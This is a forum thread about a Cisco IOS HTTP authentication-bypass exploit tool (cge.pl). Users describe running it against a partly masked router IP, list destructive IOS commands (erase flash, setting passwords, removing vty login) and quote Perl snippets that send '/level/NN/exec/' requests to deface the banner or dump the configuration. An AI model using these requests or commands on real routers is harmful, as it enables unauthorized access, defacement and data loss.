Sign in to follow this  
Followers 0
Fiend

Cisco IOS HTTP Auth Vulnerability

14 posts in this topic

I was messing around with Cisco exploits on Auditor and came accross this one.

cge.pl -h 200.xxx.xxx.xxx -v 3

Vulnerability successful exploited with [http://200.xxx.xxx.xxx/level/17/exec/....] ...

([3] - Cisco IOS HTTP Auth Vulnerability)

It says it was succesful, but what did it do? How does it work?

I don't understand and I can't find any information on the web. Supposevly you can send arbitrary commands to the Cisco router, but what commands?

0

Share this post


Link to post
Share on other sites
I was messing around with Cisco exploits on Auditor and came accross this one.

cge.pl -h 200.xxx.xxx.xxx -v 3

Vulnerability successful exploited with [http://200.xxx.xxx.xxx/level/17/exec/....] ...

([3] - Cisco IOS HTTP Auth Vulnerability)

It says it was succesful, but what did it do?  How does it work?

I don't understand and I can't find any information on the web.  Supposevly you can send arbitrary commands to the Cisco router, but what commands?

arbitrary ones

0

Share this post


Link to post
Share on other sites

show run

erase flash

enable password hax0red

username jabzor password goeshere

line vty 0 4

no login

priv 15

etc..? :P

0

Share this post


Link to post
Share on other sites
show run

erase flash

enable password hax0red

username jabzor password goeshere

line vty 0 4

  no login

  priv 15

etc..?  :P

yeah, but i think the question was "how" .. does one have to rewrite the code?

or does it work by the url so you just access "http://x.x.x.x/level/yy/exec/enable secure LoL" ??

0

Share this post


Link to post
Share on other sites

Arbitrary command is set to actually execute something (in this case changing the MOTD) from the looks of the config? -_-

0

Share this post


Link to post
Share on other sites
ah.. what ?

http://hacking.dotshell.net/tools/blackangels_cge.perl

if ($vuln == 1) {

print "\nEnter deface line : ";

$vuln = <STDIN>;

chomp($vuln);

exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");

}

elsif ($vuln == 2) {

exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n");

print "$wrf";

}

banner message of the day, the message you get when you telnet/console in :)

0

Share this post


Link to post
Share on other sites

ahm

i think we're not talkin about the same thing. the topic is about the cisco3 exploit.. your code is from cisco4 :)

0

Share this post


Link to post
Share on other sites

i am aware, cisco 3 seems to be just for authentication bypass and shitall else..

letting you access a device you otherwise had no permission to

try accessing the url the script gives you

else {

sleep(2);

print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n";

last LAB;

}

:wacko:

0

Share this post


Link to post
Share on other sites

thanks, grand elite master.

but actually i'd LIKE to understand what's going on there.

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0